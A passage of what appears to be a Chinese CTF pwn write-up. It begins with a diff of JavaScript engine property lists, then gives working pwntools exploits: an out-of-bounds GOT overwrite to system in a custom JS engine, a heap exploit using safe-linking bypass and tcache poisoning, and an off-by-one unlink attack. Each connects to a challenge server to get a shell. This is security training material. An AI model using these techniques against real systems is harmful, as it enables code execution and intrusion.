prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:test
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:RegExp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:name
prop:length
prop:message
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:EvalError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:RangeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:ReferenceError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:SyntaxError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:TypeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:URIError
prop:Error
prop:E
prop:LN2
prop:LN10
prop:LOG2E
prop:LOG10E
prop:PI
prop:M_PI_2
prop:M_PI_4
prop:M_1_PI
prop:M_2_PI
prop:M_2_SQRTPI
prop:SQRT1_2
prop:SQRT2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:abs
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:acos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:asin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:ceil
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:cos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:floor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:max
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:min
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:pow
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:random
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:round
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sqrt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:tan
prop:Math
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:error
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:assert
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:time
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:timeEnd
prop:console
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:run
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:spy
prop:gc
prop:NaN
prop:Infinity
prop:undefined
prop:this
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float64Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isNaN
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFinite
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseInt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseFloat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:eval'''
b = '''prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:create
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperty
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperties
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyDescriptor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:keys
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyNames
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getPrototypeOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:preventExtensions
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isExtensible
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:seal
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isSealed
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:freeze
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFrozen
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:hasOwnProperty
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isPrototypeOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:propertyIsEnumerable
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Object
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:prototype
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:apply
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:bind
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:call
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isGenerator
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:Function
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isArray
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:pop
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:push
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reverse
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:shift
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sort
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:splice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:unshift
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:concat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:join
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:slice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:indexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:lastIndexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:filter
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:forEach
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:every
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:map
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:some
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reduce
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reduceRight
prop:Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:fromCharCode
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charAt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charCodeAt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:concat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:indexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:lastIndexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:localeCompare
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:match
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:replace
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:search
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:slice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:split
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:substr
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:substring
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleLowerCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleUpperCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLowerCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toUpperCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trim
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trimLeft
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trimRight
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:String
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:MAX_VALUE
prop:MIN_VALUE
prop:NEGATIVE_INFINITY
prop:POSITIVE_INFINITY
prop:NaN
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toExponential
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toFixed
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toPrecision
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Number
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Boolean
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:now
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parse
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:UTC
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isDST
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getDay
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getTime
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getTimezoneOffset
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCDay
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setTime
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toGMTString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toISOString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toJSON
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toUTCString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Date
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:global
prop:ignoreCase
prop:lastIndex
prop:multiline
prop:length
prop:source
prop:sticky
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exec
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:test
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:RegExp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:name
prop:length
prop:message
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:EvalError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:RangeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:ReferenceError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:SyntaxError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:TypeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:URIError
prop:Error
prop:E
prop:LN2
prop:LN10
prop:LOG2E
prop:LOG10E
prop:PI
prop:M_PI_2
prop:M_PI_4
prop:M_1_PI
prop:M_2_PI
prop:M_2_SQRTPI
prop:SQRT1_2
prop:SQRT2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:abs
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:acos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:asin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:ceil
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:cos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:floor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:max
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:min
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:pow
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:random
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:round
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sqrt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:tan
prop:Math
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:error
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:assert
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:time
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:timeEnd
prop:console
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:run
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:spy
prop:gc
prop:NaN
prop:Infinity
prop:undefined
prop:this
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float64Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isNaN
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFinite
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseInt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseFloat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:eval
prop:length
prop:FH_VERSION
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:load
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:print
'''
a = a.splitlines()
b = b.splitlines()
for i in a:
if i not in b:
print(i)找到新增函数 charTo,charAt有越界读,并且发现 charTo 被修改,存在越界写,需要保证string长度为3
from pwn import *
context.log_level = "debug"
#sh = process(['./ojs'], stdin=PTY)
sh = remote('47.95.3.91', 24377)
#gdb.attach(sh, "b *0x0000000000410C2F")
with open("poc.js", "r") as f:
for i in f.readlines():
sh.sendlineafter(">", i)
sh.sendline("cat flag")
sh.interactive()字符串的 replace 内部会调用 strstr,开局调用一次让 got 表有 libc,然后改 libc 为 system,再触发一次就 RCE 了
a = "ABC";
x = a.charTo(0, 0x11);
sh = "/bin/sh"
sh.replace('x', 'y')
strstr = 0x629290;
offset = strstr - x;
o1 = a.charAt(offset) & 0xff;
o2 = a.charAt(offset + 1) & 0xff;
o3 = a.charAt(offset + 2) & 0xff;
a.charTo(offset, o1 - 0x50)
a.charTo(offset + 1, o2 + 0x4a)
a.charTo(offset + 2, o3 - 0x7)
sh.replace('x', 'y')xpp
node 结构体
00000000 node struc ; (sizeof=0x20, mappedto_21)
00000000 left dq ? ; offset
00000008 right dq ? ; offset
00000010 value dq ? ; offset
00000018 id dq ?
00000020 node endsstring 结构体
00000000 string struc ; (sizeof=0x30, mappedto_20)
00000000 cache db 24 dup(?)
00000018 ptr dq ? ; offset
00000020 len dq ?
00000028 key dq ?
00000030 string endsEXP
from pwn import *
sh = process('./xpp_bak')
def choice(idx):
sh.sendlineafter("5. Exit", str(idx))
def add(content):
choice(1)
sh.sendlineafter("Content:", content)
def show(key):
choice(2)
sh.sendlineafter("Key: ", str(key))
def delete(key):
choice(3)
sh.sendlineafter("Key:", str(key))
def edit(key, content):
choice(4)
sh.sendlineafter("Key:", str(key))
sh.sendlineafter("New note:", str(content))
def deprotect(prot):
mask = 0xfff << (12 * 3)
ptr_3 = prot & mask
mask >>= 12
ptr_2 = (prot & mask) ^ (ptr_3 >> 12)
mask >>= 12
ptr_1 = (prot & mask) ^ (ptr_2 >> 12)
mask >>= 12
ptr_0 = (prot & mask) ^ (ptr_1 >> 12)
return ptr_0 | ptr_1 | ptr_2 | ptr_3
context.log_level = "debug"
# add('0' * 0x800)
add("6" * 0x800)
add("0" * 8)
show(str(0x3030303030303030))
libc_base = u64(sh.recvuntil('\\x7f')[-6:].ljust(8, '\\x00')) - 0x21a330
log.success("libc_base:\\t" + hex(libc_base))
add("0" * 0x20)
add("2" * 0x8)
add("5" * 0x20)
add("4" * 0x20)
add("0" * 0x20)
delete(str(0x3535353535353535))
delete(str(0x3636363636363636))
add("0" * 0x20)
add("1" * 0x20)
add("3" * 8)
delete(str(0x3131313131313131))
show(str(0x3232323232323232))
heap_leak = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00'))
log.success("heap_leak:\\t" + hex(heap_leak))
heap_base = deprotect(heap_leak) - 0x12840
log.success("heap_base:\\t" + hex(heap_base))
std_Init = libc_base + 0x3e58f0
environ = libc_base + 0x221200
cpp_fflush = libc_base + 0x554260
system_addr = libc_base + 0x50d60
cerr = libc_base + 0x556420
edit(str(0x3232323232323232), p64((cerr - 0x10) ^ ((heap_base + 0x127d0) >> 12)))
add("9" * 8)
add('a' * 0x10 + '/bin/sh\\x00')
delete(str(0x3939393939393939))
edit(str(0x3333333333333333), p64((cpp_fflush) ^ ((heap_base + 0x127d0) >> 12)))
add('k' * 8)
add(p64(system_addr))
sh.interactive()bitheap
Edit 功能可以有一个位的溢出,可以覆盖下个堆块的 prev_inuse,可泄露堆地址的 off by null
from pwn import *
context.log_level = "debug"
context.arch = "amd64"
sh = remote('101.201.71.136', 33358)
#sh = process(['./bitheap'])
def choice(idx):
sh.sendlineafter("choice: ", str(idx))
def add(idx, size):
choice(1)
sh.sendlineafter("Index: ", str(idx))
sh.sendlineafter("Size: ", str(size))
def edit(idx, content, tag=False):
choice(2)
sh.sendlineafter("Index: ", str(idx))
send_content = ""
for i in content:
send_content += bin(u8(i))[2:].rjust(8, '0')[::-1]
if tag:
send_content += '0'
sh.sendafter("Content: ", send_content)
def show(idx):
choice(3)
sh.sendlineafter("Index: ", str(idx))
def delete(idx):
choice(4)
sh.sendlineafter("Index: ", str(idx))
add(0, 0x88)
add(1, 0x88)
for i in range(2, 2 + 7):
add(i, 0x88)
delete(0)
delete(1)
add(1, 0x88)
add(0, 0x88)
show(1)
heap_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x260
log.success("heap_base:\\t" + hex(heap_base))
fake_chunk = heap_base + 0x2e0
fake_ptr = fake_chunk + 0x20
fd = fake_ptr - 0x18
bk = fake_ptr - 0x10
chunk_data = p64(fd) + p64(bk) + p64(fake_chunk)
chunk_data = chunk_data.ljust(0x80, '\\x00') + p64(0x90)
edit(1, chunk_data, True)
for i in range(2, 2 + 7):
delete(i)
delete(0)
for i in range(2, 2 + 7):
add(i, 0x88)
add(0, 0x88)
show(1)
